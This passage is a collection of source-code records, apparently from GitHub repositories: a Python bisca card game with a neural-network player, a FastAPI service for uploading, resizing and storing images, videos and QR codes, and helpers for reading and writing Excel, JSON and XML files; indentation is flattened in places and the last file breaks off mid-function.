if (len(self._mao) > 1 and (decisao[0][1] > decisao[0][0])):
# A segunda maior probabilidade é da carta 2
# e na mão há duas cartas
escolha = 2
else:
# A segunda maior probabilidade é da carta 1
# neste caso não importa a quantidade de cartas na mão
escolha = 1
if len(self._mao) < 2 and escolha == 2:
# Escolheu uma posição que não existe carta
# Neste caso, só podemos ter a opção 1
escolha = 1
return escolha
# Pegando os pesos da rede neural. Retorna um array do numpy.
def get_pesos_da_rede_neural(self):
return self._tomador_de_decisao.get_weights()
# Configurando os pesos da rede neural. Deve receber um array do numpy compatível com
# a arquitetura da rede
def set_pesos_da_rede_neural(self, novos_pesos):
self._tomador_de_decisao.set_weights(novos_pesos)
'''
class MesaDeBisca():
    # Class used as the base for the bisca game
def __init__(self, numero_de_jogadores):
self._baralho = None #BaralhoDeBisca()
self._numero_de_jogadores = numero_de_jogadores
self._jogadores = []
self._cartas_jogadas = ['' for p in range(numero_de_jogadores)]
self._quem_jogou_as_cartas = ['' for p in range(numero_de_jogadores)]
#A ideia é que o nome do jogador apareça em _quem_jogou_as_cartas
#A partir de sua posição, pegar a carta jogada
self._carta_da_mesa = None
# A ideia é usar o parâmetro do número de jogadores para o jogo saber quando pode começar
# _jogadores deve ser uma lista com _numero_de_jogadores JogadorDeBisca
self._equipe_A = []
self._pontos_A = 0
self._equipe_B = []
self._pontos_B = 0
# Após completar a lista _jogadores, as listas _equipe_? vão ser preenchidas
def adicionar_jogador(self, nome):
# função a ser chamada para preencher a lista de jogadores
if (len(self._jogadores) < self._numero_de_jogadores):
while(True):
try:
print('\n Escolha o tipo do jogador: ')
print('(1) Jogador humano')
print('(2) NPC Dummy')
#print('(3) NPC Smart')
tipo_do_jogador = input()
if (int(tipo_do_jogador) == 1):
self._jogadores.append(JogadorDeBisca(nome))
print('Jogador humano adicionado!')
break
elif (int(tipo_do_jogador) == 2):
self._jogadores.append(DummyPlayer(nome))
print('NPC Dummy adicionado!')
break
#elif (int(tipo_do_jogador) == 3):
# self._jogadores.append(SmartPlayer(nome))
# print('NPC Smart adicionado!')
# break
else:
raise
except:
print('Por favor, digite um numero entre as opcoes em parenteses!')
else:
print("Não é possível adicionar mais jogadores!")
def dividir_equipes(self):
# função a ser chamada para preencher as listas de equipes
if (len(self._jogadores) == self._numero_de_jogadores):
# adiciona na equipe A os jogadores que estiverem em uma ordem PAR na lista de jogadores
self._equipe_A = \
[player for player in self._jogadores if ((self._jogadores.index(player)% 2) == 0)]
# adiciona na equipe B os jogadores que estiverem em uma ordem ÍMPAR na lista de jogadores
self._equipe_B = \
[player for player in self._jogadores if ((self._jogadores.index(player)% 2) != 0)]
else:
print("A lista de jogadores precisa estar completa!")
@property
def equipe_A(self):
return self._equipe_A
@property
def equipe_B(self):
return self._equipe_B
@property
def jogadores(self):
return self._jogadores
def __len__(self):
return self._baralho.__len__()
@property
def cartas_jogadas(self):
return self._cartas_jogadas
@property
def carta_da_mesa(self):
return self._carta_da_mesa
def puxar_uma_carta(self, index_do_jogador):
# função para tirar uma carta do baralho (ou da mesa) e passar para o jogador
# preciso passar a posição do jogador na lista de jogadores
if (len(self._baralho) > 0):
# ainda há cartas no baralho
carta = self._baralho.tirar_uma_carta()
self._jogadores[index_do_jogador].adicionar_carta_na_mao(carta)
else:
# crio uma cópia da carta da mesa e dou ao jogador
# esta condição só deve ocorrer uma única vez!!!
carta = Carta(self._carta_da_mesa.naipe, self._carta_da_mesa.numero)
self._jogadores[index_do_jogador].adicionar_carta_na_mao(carta)
# def mostrar_carta_do_jogador(self, index_do_jogador):
# # mostra as cartas do jogador identificado por index_do_jogador (posição da lista de jogadores)
# print(self._jogadores[index_do_jogador].nome)
# print(self._jogadores[index_do_jogador])
def prepara_a_mesa(self):
# função para gerar o baralho, preencher a carta da mesa e dar 3 cartas iniciais aos jogadores
self._baralho = BaralhoDeBisca(self._numero_de_jogadores % 2 == 0)
self._baralho.embaralhar()
self._carta_da_mesa = self._baralho.tirar_uma_carta()
for player in self._jogadores:
while (len(player) < JogadorDeBisca.tamanho_max_mao):
# vai dando cartas ao jogador até preencher 3 na mão
self.puxar_uma_carta(self._jogadores.index(player))
def atualiza_cartas_jogadas(self, player, carta_jogada, vez):
# adiciona na lista de jogadas um elemento do tipo [jogador, carta_jogada]
# vez indica a posição nas listas. Vai de 0 a numero_de_jogadores-1
if (vez < self._numero_de_jogadores):
self._quem_jogou_as_cartas[vez] = player
self._cartas_jogadas[vez] = carta_jogada
else:
print("Erro! O número excedeu a quantidade de jogadores!")
def encerra_rodada (self):
# identifica quem jogou a carta mais forte e retorna o nome para que o jogo saiba quem começa depois
pos = 0 #qual a posição em cartas_jogadas
jogador_mais_forte = None
carta_mais_forte = self._cartas_jogadas[pos] # qual a carta para efeito de comparação
for jogada in self._cartas_jogadas: #tá preenchendo errado o cartas_jogadas
if jogada.naipe == carta_mais_forte.naipe:
# se o naipe for igual, quem define a mais forte é a pontuação
if jogada.pontos >= carta_mais_forte.pontos:
carta_mais_forte = jogada
jogador_mais_forte = self._quem_jogou_as_cartas[pos] #jogador
else: #naipes diferentes
# se o naipe é diferente, preciso verificar se a nova carta verificada é da mesa
if jogada.naipe == self._carta_da_mesa.naipe:
carta_mais_forte = jogada
jogador_mais_forte = self._quem_jogou_as_cartas[pos] #jogador
pos += 1
if jogador_mais_forte in self._equipe_A:
# se o jogador da carta mais forte da rodada está na equipe A
for carta in self._cartas_jogadas:
# adicionar cada carta das jogadas na pilha de pontos dos jogadores da equipe A
for jogador in self._equipe_A:
jogador.adicionar_carta_na_pilha(carta)
else:
# se o jogador da carta mais forte da rodada está na equipe B
for carta in self._cartas_jogadas:
# adicionar cada carta das jogadas na pilha de pontos dos jogadores da equipe B
for jogador in self._equipe_B:
jogador.adicionar_carta_na_pilha(carta)
self._cartas_jogadas = ['' for p in range(self._numero_de_jogadores)]
# esvaziar a lista de cartas jogadas
self._quem_jogou_as_cartas = ['' for p in range(self._numero_de_jogadores)]
# esvaziar a lista de quem jogou as cartas
return jogador_mais_forte
def acabou_jogo(self):
# verifica se a mão de todos os jogadores esvaziou. Se sim, retorna True.
# Caso contrário, retorna False.
acabou_jogo = True
for jogador in self._jogadores:
if (len(jogador) != 0):
acabou_jogo = False
break
return acabou_jogo
def imprimir_mesa(self):
# método para imprimir o conteúdo da mesa
if self._numero_de_jogadores == 2:
print (self._jogadores[0].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0].nome)]\
.__str__()) # tipo Carta !!!!
print ('\n\n')
print('Mesa: {}'.format(self._carta_da_mesa.__str__()))
print ('\n\n')
print (self._jogadores[1].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[1].nome)]\
.__str__()) # tipo Carta
elif self._numero_de_jogadores == 3:
print (self._jogadores[0].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0].nome)]\
.__str__()) # tipo Carta
print ('\n\n')
print('Mesa: {}'.format(self._carta_da_mesa.__str__()))
print ('\n\n')
print ('{} || {}'.format
(self._jogadores[1].nome, self._jogadores[2].nome))
# nome do jogador
print ('{} || {}'.format
(self._cartas_jogadas[self._quem_jogou_as_cartas.index(self._jogadores[1].nome)]\
.__str__(), self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[2].nome)].__str__()))
# tipo Carta
elif self._numero_de_jogadores == 4:
print('\n')
print(40*'-')
print ('\n{} || {}'.format
(self._jogadores[0].nome, self._jogadores[1].nome))
# nome do jogador fixado
try:
print('{} || '.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0])].__str__()), end='')
except:
print(' || ', end='')
try:
print('{}'.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[1])].__str__()))
except:
print(' ')
print ('\n\n')
print('Mesa: {} ({})'.format(self._carta_da_mesa.__str__(), len(self._baralho)))
print ('\n\n')
print ('{} || {}'.format
(self._jogadores[3].nome, self._jogadores[2].nome)) # invertido!!
# nome do jogador
try:
print('{} || '.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[3])].__str__()), end='')
except:
print(' || ', end='')
try:
print('{}'.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[2])].__str__()))
except:
print(' ')
print(40*'-')
print ('\n\n')
# Pode ter mais, porém vou parar em 4 por enquanto
def imprimir_pontos(self):
# método para exibir os pontos em formato de tabela
print('\n.----------------------------------------.')
print('|------------TABELA DE PONTOS------------|')
print('|----------------------------------------|')
print('| |')
print('| EQUIPE A {:03d} pontos |'.format\
(self._equipe_A[0]._pilha_de_pontos.contar_pontos()))
print('| |')
print('| EQUIPE B {:03d} pontos |'.format\
(self._equipe_B[0]._pilha_de_pontos.contar_pontos()))
print('.----------------------------------------.')
print('\n')
```
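A small usage sketch, assuming the file is importable as `classes_base`: build a deck for an even number of players, shuffle it, and deal a starting hand.

```python
from classes_base import BaralhoDeBisca, JogadorDeBisca  # assumed module name

deck = BaralhoDeBisca(n_par_de_jogadores=True)  # 40-card bisca deck
deck.embaralhar()

player = JogadorDeBisca("Alice")
for _ in range(JogadorDeBisca.tamanho_max_mao):
    player.adicionar_carta_na_mao(deck.tirar_uma_carta())

print(player)     # e.g. "7.OUROS A.PAUS 4.COPAS"
print(len(deck))  # 37 cards remaining
```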
|
{
"source": "JexPY/filemanager-fastapi",
"score": 2
}
|
#### File: api/app/main.py
```python
from fastapi import FastAPI, File, UploadFile, BackgroundTasks, Depends, HTTPException,status,Query
from fastapi.responses import FileResponse
from fastapi.middleware.cors import CORSMiddleware
from fastapi.security import HTTPBearer,OAuth2AuthorizationCodeBearer,HTTPBasicCredentials
from fastapi.staticfiles import StaticFiles
from dotenv import load_dotenv
from typing import List,Optional
import os
import sys
from services.serveUploadedFiles import handle_upload_image_file, handle_multiple_image_file_uploads, handle_upload_video_file
from services.serveQrcode import handle_qr_code
from services.security.customBearerCheck import validate_token
from services.storage.local import response_image_file
from services.serveDataFromUrl import handle_download_data_from_url, handle_multiple_image_file_downloads
load_dotenv()
app = FastAPI(docs_url=None if os.environ.get('docs_url') == 'None' else '/docs', redoc_url=None if os.environ.get('redoc_url') == 'None' else '/redoc')
# If you want to serve files from local server you need to mount your static file directory
if os.environ.get('PREFERED_STORAGE') == 'local' and 'pytest' not in sys.modules.keys():
app.mount("/static", StaticFiles(directory="static"), name="static")
# If you want cors configuration also possible thanks to fast-api
origins = os.environ.get('CORS_ORIGINS').split(',')
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get("/", tags=["main"])
def root(
cpu_load: Optional[str] = Query(
False,
description='True/False depending your needs, gets average CPU load value',
regex='^(True|False)$'
),
token: str = Depends(validate_token)):
result = {
"Hello": f"Token is {token}",
}
if cpu_load == 'True':
result['cpu_average_load'] = os.getloadavg()
return result
# File size is validated by NGINX
@app.post("/image", tags=["image"])
async def upload_image_file(
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
description='True/False depending your needs',
regex='^(True|False)$'
),
file: UploadFile = File(...),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_upload_image_file(True if thumbnail == 'True' else False, file)
@app.post("/images", tags=["image"])
async def upload_image_files(
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
description='True/False depending your needs',
regex='^(True|False)$'
),
files: List[UploadFile] = File(...),
OAuth2AuthorizationCodeBearer = Depends(validate_token)
):
fileAmount = len(files)
if fileAmount > int(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT')):
raise HTTPException(
status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE,
detail='Amount of files must not be more than {}'.format(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT'))
)
return handle_multiple_image_file_uploads(files, fileAmount, True if thumbnail == 'True' else False)
@app.get("/image", tags=["image"])
async def get_image(
image: str = Query(...,
description='uploaded image name',
max_length=50
),
image_type: str = Query(
...,
        description='Should provide the version of the image you want from local storage: original, thumbnail or qrImage',
regex='^(original|thumbnail|qrImage)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)
):
return response_image_file(image, image_type)
@app.post("/qrImage", tags=["image"])
async def text_to_generate_qr_image(
qr_text: str = Query(
...,
description='Provide text to generate qr image',
),
with_logo: Optional[str] = Query(
os.environ.get('QR_IMAGE_WITH_LOGO'),
description='True/False depending your needs default is {}'.format(os.environ.get('QR_IMAGE_WITH_LOGO')),
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_qr_code(qr_text, True if with_logo == 'True' else False)
@app.post("/video", tags=["video"])
async def upload_video_file(
optimize: Optional[str] = Query(
os.environ.get('VIDEO_OPTIMIZE'),
        description='True/False depending on your needs; default is {}'.format(os.environ.get('VIDEO_OPTIMIZE')),
regex='^(True|False)$'
),
file: UploadFile = File(..., description='Allows mov, mp4, m4a, 3gp, 3g2, mj2'),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_upload_video_file(True if optimize == 'True' else False, file)
@app.get("/imageUrl", tags=["from url"])
async def image_from_url(
image_url: str = Query(
None,
description = "Pass valid image url to upload",
min_length = 5
),
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
        description='True/False depending on your needs',
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_download_data_from_url(image_url, True if thumbnail == 'True' else False, file_type='image')
@app.get("/imageUrls", tags=["from url"])
async def images_from_urls(
image_urls: List[str] = Query(
None,
description = "Pass valid image urls to upload",
min_length = 5
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
fileAmount = len(image_urls)
if fileAmount > int(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT')):
raise HTTPException(
status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE,
            detail='Number of files must not exceed {}'.format(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT'))
)
return handle_multiple_image_file_downloads(image_urls, fileAmount)
@app.get("/videoUrl", tags=["from url"])
async def video_from_url(
video_url: str = Query(
None,
description = "Pass valid video url to upload",
min_length = 5
),
optimize: Optional[str] = Query(
os.environ.get('VIDEO_OPTIMIZE'),
        description='True/False depending on your needs; default is {}'.format(os.environ.get('VIDEO_OPTIMIZE')),
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_download_data_from_url(video_url, False, True if optimize == 'True' else False, file_type='video')
```
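The handlers above pull their defaults from environment variables and guard every route with `validate_token`, so the quickest way to exercise them locally is FastAPI's test client with that dependency overridden. A minimal sketch, assuming the module above is importable as `main` and that a local `sample.jpg` exists (both are assumptions, not part of this repository):
```python
# Smoke test for the endpoints above; bypasses the real bearer check.
from fastapi.testclient import TestClient

import main  # assumed module name for the app defined above
from services.security.customBearerCheck import validate_token

# Override the token dependency so no real token is needed in local runs.
main.app.dependency_overrides[validate_token] = lambda: "test-token"

client = TestClient(main.app)

response = client.get("/", params={"cpu_load": "True"})
print(response.status_code, response.json())

with open("sample.jpg", "rb") as fh:  # hypothetical local file
    response = client.post("/image", params={"thumbnail": "True"},
                           files={"file": ("sample.jpg", fh, "image/jpeg")})
print(response.status_code, response.json())
```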
#### File: services/helpers/alena.py
```python
import os
from pathlib import Path
def cleaning_service(pathsToClean, images = False, videos = False):
if images:
if pathsToClean.get('original'):
if Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).is_file():
Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).unlink()
if pathsToClean.get('thumbnail'):
if Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + pathsToClean['thumbnail']).is_file():
Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + pathsToClean['thumbnail']).unlink()
if pathsToClean.get('qrImage'):
if Path(os.environ.get('QR_IMAGE_LOCAL_PATH') + pathsToClean['qrImage']).is_file():
Path(os.environ.get('QR_IMAGE_LOCAL_PATH') + pathsToClean['qrImage']).unlink()
elif videos:
if pathsToClean.get('original'):
if Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).is_file():
Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).unlink()
if pathsToClean.get('optimized'):
if Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + pathsToClean['optimized']).is_file():
Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + pathsToClean['optimized']).unlink()
def local_savings(images = False, videos = False, qrCodes = False):
if images:
Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
elif videos:
Path(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
Path(os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
elif qrCodes:
Path(os.environ.get('QR_IMAGE_LOCAL_PATH')).mkdir(parents=True, exist_ok=True)
```
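`local_savings` creates the target directories up front, and `cleaning_service` removes whichever local copies exist for the paths it is given. A small sketch of how they are typically combined; the import path is inferred from the file layout and the directory values are placeholders standing in for the real `*_LOCAL_PATH` settings:
```python
# Illustrative only: environment values here are placeholders.
import os
from services.helpers.alena import local_savings, cleaning_service  # path assumed

os.environ.setdefault("IMAGE_ORIGINAL_LOCAL_PATH", "static/images/original/")
os.environ.setdefault("IMAGE_THUMBNAIL_LOCAL_PATH", "static/images/thumbnail/")
os.environ.setdefault("QR_IMAGE_LOCAL_PATH", "static/images/qr/")

# Make sure the image directories exist before writing files into them.
local_savings(images=True)

# After the files have been pushed to cloud storage, drop the local copies.
cleaning_service({"original": "abc.jpg", "thumbnail": "abc_thumb.jpg"}, images=True)
```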
#### File: services/images/resize.py
```python
import os
import ffmpeg
from PIL import Image
from uuid import uuid4
from pathlib import Path
from fastapi import HTTPException, status
from ..helpers.alena import local_savings
from ..helpers.uniqueFileName import generate_unique_name
def resize_image(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
if not thumbnail and not os.environ.get('SAVE_ORIGINAL') == 'True':
        raise HTTPException(status_code=status.HTTP_503_SERVICE_UNAVAILABLE, detail='Saving the original is disabled, contact admin')
local_savings(images=True)
if os.environ.get('IMAGE_OPTIMIZATION_USING') == 'ffmpeg':
return resize_image_pillow_FFMPEG(temp_stored_file, extension, thumbnail, desiredExtension)
return resize_image_pillow_SIMD(temp_stored_file, extension, thumbnail, desiredExtension)
def resize_image_pillow_SIMD(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
try:
origin, thumb = generate_unique_name(extension, desiredExtension)
img = Image.open(temp_stored_file)
if os.environ.get('SAVE_ORIGINAL') == 'True':
img.save(Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + origin).absolute())
else:
origin = None
if thumbnail:
resize_width = int(os.environ.get('THUMBNAIL_MAX_WIDHT'))
wpercent = (resize_width/float(img.size[0]))
hsize = int((float(img.size[1])*float(wpercent)))
img.thumbnail((resize_width,hsize), Image.BICUBIC)
img.save(Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + thumb).absolute())
else:
thumb = None
return {
'original': origin,
'thumbnail': thumb
}
    except Exception:
        raise HTTPException(status_code=503, detail="Image manipulation failed using pillow-SIMD")
def resize_image_pillow_FFMPEG(temp_stored_file: Path, extension: str, thumbnail: bool, desiredExtension: str):
try:
origin, thumb = generate_unique_name(extension, desiredExtension)
        # Re-encode and save the original (ffmpeg typically reduces the file size)
if os.environ.get('SAVE_ORIGINAL') == 'True':
(
ffmpeg
.input(temp_stored_file)
.output(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + origin)
.run(quiet=True)
)
else:
origin = None
if thumbnail:
            # Resize and save the thumbnail
(
ffmpeg
.input(temp_stored_file)
.filter("scale", os.environ.get('THUMBNAIL_MAX_WIDHT'), "-1")
.output(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + thumb)
.run(quiet=True)
)
else:
thumb = None
return {
'original': origin,
'thumbnail': thumb
}
    except Exception:
        raise HTTPException(status_code=503, detail="Image manipulation failed using FFMPEG")
```
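The pillow branch derives the thumbnail height from the requested width so the aspect ratio is preserved: `wpercent` is the ratio of `THUMBNAIL_MAX_WIDHT` to the original width, and `hsize` scales the original height by it. A short worked example of that arithmetic; the 1920x1080 input and the width of 300 are made-up values:
```python
# Worked example of the wpercent/hsize computation used above.
original_width, original_height = 1920, 1080
resize_width = 300  # e.g. THUMBNAIL_MAX_WIDHT=300

wpercent = resize_width / float(original_width)         # 0.15625
hsize = int(float(original_height) * float(wpercent))   # 168

print((resize_width, hsize))  # (300, 168) keeps roughly the 16:9 aspect ratio
```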
#### File: services/storage/googleCloud.py
```python
import os
from libcloud.storage.types import Provider
from libcloud.storage.providers import get_driver
from ..helpers.alena import cleaning_service
def authorize_google():
cls = get_driver(Provider.GOOGLE_STORAGE)
googleStorageDriver = cls(os.environ.get('GOOGLE_CLIENT_EMAIL'), os.environ.get('GOOGLE_STORAGE_KEY_FILE'))
googleContainer = googleStorageDriver.get_container(os.environ.get('DEFAULT_BUCKET_NAME'))
return googleStorageDriver, googleContainer
def upload_video_file_to_google_storage(videoPaths: dict):
googleCloudStorageDriver, container = authorize_google()
if videoPaths.get('original'):
with open('./' + os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + videoPaths['original'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('VIDEO_ORIGINAL_GOOGLE_CLOUD_PATH') + videoPaths['original'])
if videoPaths.get('optimized'):
with open('./' + os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + videoPaths['optimized'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('VIDEO_OPTIMIZED_GOOGLE_CLOUD_PATH') + videoPaths['optimized'])
return cleaning_service(videoPaths, videos=True)
def upload_image_file_to_google_storage(imagePaths: dict):
googleCloudStorageDriver, container = authorize_google()
if imagePaths.get('original'):
with open('./' + os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + imagePaths['original'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('IMAGE_ORIGINAL_GOOGLE_CLOUD_PATH') + imagePaths['original'])
if imagePaths.get('thumbnail'):
with open('./' + os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + imagePaths['thumbnail'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('IMAGE_THUMBNAIL_GOOGLE_CLOUD_PATH') + imagePaths['thumbnail'])
if imagePaths.get('qrImage'):
with open('./' + os.environ.get('QR_IMAGE_LOCAL_PATH') + imagePaths['qrImage'], 'rb') as iterator:
googleCloudStorageDriver.upload_object_via_stream(iterator=iterator,
container=container,
object_name=os.environ.get('QR_IMAGE_GOOGLE_CLOUD_PATH') + imagePaths['qrImage'])
return cleaning_service(imagePaths, images=True)
```
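Each upload helper streams the local file into the bucket and then lets `cleaning_service` delete the local copy, so verifying an upload means asking the bucket directly. A rough sketch using the same libcloud driver; the object name and download path are placeholders:
```python
# Sketch: confirm an uploaded object exists and pull it back down with libcloud.
from services.storage.googleCloud import authorize_google  # path assumed

driver, container = authorize_google()

# List everything currently in the container (can be slow on large buckets).
for obj in driver.list_container_objects(container):
    print(obj.name, obj.size)

# Download one object back to a local path to spot-check the upload.
obj = driver.get_object(container.name, "images/original/abc.jpg")  # placeholder object name
driver.download_object(obj, destination_path="/tmp/abc.jpg", overwrite_existing=True)
```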
#### File: services/storage/local.py
```python
import os
from pathlib import Path
from fastapi.responses import FileResponse
from fastapi import HTTPException, status
def response_image_file(filename: str, image_type: str):
validPath = {
'original': os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH'),
'thumbnail': os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH'),
'qrImage': os.environ.get('QR_IMAGE_LOCAL_PATH'),
}
if not Path(validPath[image_type] + filename).is_file():
        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail='File not found, please recheck the name')
return FileResponse(validPath[image_type] + filename)
```
#### File: services/videos/optimize.py
```python
import os
import ffmpeg
from PIL import Image
from pathlib import Path
from ..helpers.uniqueFileName import generate_unique_name
from ..helpers.alena import local_savings
from fastapi import HTTPException, status
def video_file_FFMPEG(temp_stored_file: Path, optimize: bool):
try:
if not optimize and not os.environ.get('SAVE_ORIGINAL') == 'True':
            raise HTTPException(status_code=status.HTTP_503_SERVICE_UNAVAILABLE, detail='Saving the original is disabled, contact admin')
local_savings(videos=True)
origin, optimized = generate_unique_name(os.environ.get('VIDEO_AllOWED_FILE_FORMAT'), os.environ.get('VIDEO_DESIRED_FILE_FORMAT'))
        # Save the original; this config handles mp4 or mov input and usually decreases size by default
if os.environ.get('SAVE_ORIGINAL') == 'True':
(
ffmpeg
.input(temp_stored_file)
.output(os.environ.get('VIDEO_ORIGINAL_LOCAL_PATH') + origin, vcodec='h264', acodec='aac')
.run(quiet=True)
)
else:
origin = None
if optimize:
audio = ffmpeg.input(temp_stored_file).audio
video = ffmpeg.input(temp_stored_file).video.filter('scale', size='640x1136', force_original_aspect_ratio='decrease').filter('pad', '640', '1136', '(ow-iw)/2', '(oh-ih)/2')
# ffmpeg config for webm
            # It is also possible to use vcodec libvpx-vp9, but it can sometimes increase size; test whether it suits your content better
# Check docs https://trac.ffmpeg.org/wiki/Encode/VP9
if os.environ.get('VIDEO_DESIRED_FILE_FORMAT') == 'webm':
out = ffmpeg.output(video, audio, os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + optimized, crf='10', qmin='0', qmax='50', video_bitrate='1M', vcodec='libvpx', acodec='libvorbis')
# ffmpeg config for mp4
elif os.environ.get('VIDEO_DESIRED_FILE_FORMAT') == 'mp4':
out = ffmpeg.output(video, audio, os.environ.get('VIDEO_OPTIMIZED_LOCAL_PATH') + optimized, vcodec='h264', acodec='aac')
out.run(quiet=True)
else:
optimized = None
return {
'original': origin,
'optimized': optimized
}
    except HTTPException:
        raise
    except Exception:
        raise HTTPException(status_code=503, detail="Video manipulation failed using FFMPEG")
```
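Because the output codec and container are driven by `VIDEO_DESIRED_FILE_FORMAT`, it can help to probe the optimized file afterwards and confirm ffmpeg produced the expected streams. A small sketch with ffmpeg-python's `probe` (needs the `ffprobe` binary on PATH; the file path is a placeholder):
```python
# Inspect an optimized output with ffprobe to confirm codec and resolution.
import ffmpeg

info = ffmpeg.probe("static/videos/optimized/abc.mp4")  # placeholder path

for stream in info["streams"]:
    if stream["codec_type"] == "video":
        print(stream["codec_name"], stream["width"], stream["height"])
    elif stream["codec_type"] == "audio":
        print(stream["codec_name"])
```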
|
{
"source": "Jexulie/tsoft-lib",
"score": 3
}
|
#### File: tsoftlib/helpers/excelReader.py
```python
from xlrd import open_workbook
import os
import re
DEFAULTEXCELPATH = './excel'
def readDir():
l = []
(_, _, fileList) = next(os.walk(DEFAULTEXCELPATH))
for f in fileList:
if re.match(r'^.*\.xlsx$', f):
l.append(f)
return l
def readExcel():
excelData = {}
for file in readDir():
book = open_workbook(DEFAULTEXCELPATH + '/' + file)
bookData = []
for sheet in book.sheets():
sheetData = []
for row in range(1, sheet.nrows):
col_names = sheet.row(0)
rowData = []
for name, col in zip(col_names, range(sheet.ncols)):
value = str(sheet.cell(row, col).value)
rowValues = {
"colName": name.value,
"rowValue": value
}
rowData.append(rowValues)
sheetData.append(rowData)
bookData.append(sheetData)
excelData[file] = bookData
return excelData
```
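`readExcel` returns a nested structure keyed by file name: a list of sheets, each a list of rows, each row a list of `{colName, rowValue}` cells. A short sketch of walking that structure; the import path is inferred from the file layout, and note that xlrd 2.x dropped `.xlsx` support, so this helper assumes an older xlrd:
```python
# Walk the structure produced by readExcel(): file -> sheets -> rows -> cells.
from tsoftlib.helpers.excelReader import readExcel  # import path assumed from the file layout

for file_name, sheets in readExcel().items():
    print(file_name)
    for sheet in sheets:
        for row in sheet:
            # Each cell is {"colName": <header>, "rowValue": <string value>}
            print({cell["colName"]: cell["rowValue"] for cell in row})
```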
#### File: tsoftlib/helpers/fileMaker.py
```python
import os
def makeFolderIfNotExists(path):
os.makedirs(path, exist_ok=True)
```
#### File: tsoftlib/helpers/printer.py
```python
import xlsxwriter
import json
from dicttoxml import dicttoxml
from .fileMaker import makeFolderIfNotExists
DEFAULTOUTPUTPATH = './output'
# fileName (str) | data (list of dicts) -> column names / values
def PrintToExcel(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
workbook = xlsxwriter.Workbook(f'{DEFAULTOUTPUTPATH}/{fileName}.xlsx')
worksheet = workbook.add_worksheet('1')
row = 0
col = 0
colNames = data[0].keys()
# Write ColumnNames to First Row of sheet
for names in colNames:
worksheet.write(row, col, names)
col += 1
col = 0
row += 1
for item in data:
for index, name in enumerate(colNames):
try:
worksheet.write(row, index, item[name])
            except Exception:
worksheet.write(row, index, '')
row += 1
workbook.close()
def PrintToJson(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
    with open(f'{DEFAULTOUTPUTPATH}/{fileName}.json', 'w+') as file:
        file.write(json.dumps(data))
def PrintToXML(fileName, data):
makeFolderIfNotExists(DEFAULTOUTPUTPATH)
    with open(f'{DEFAULTOUTPUTPATH}/{fileName}.xml', 'w+') as file:
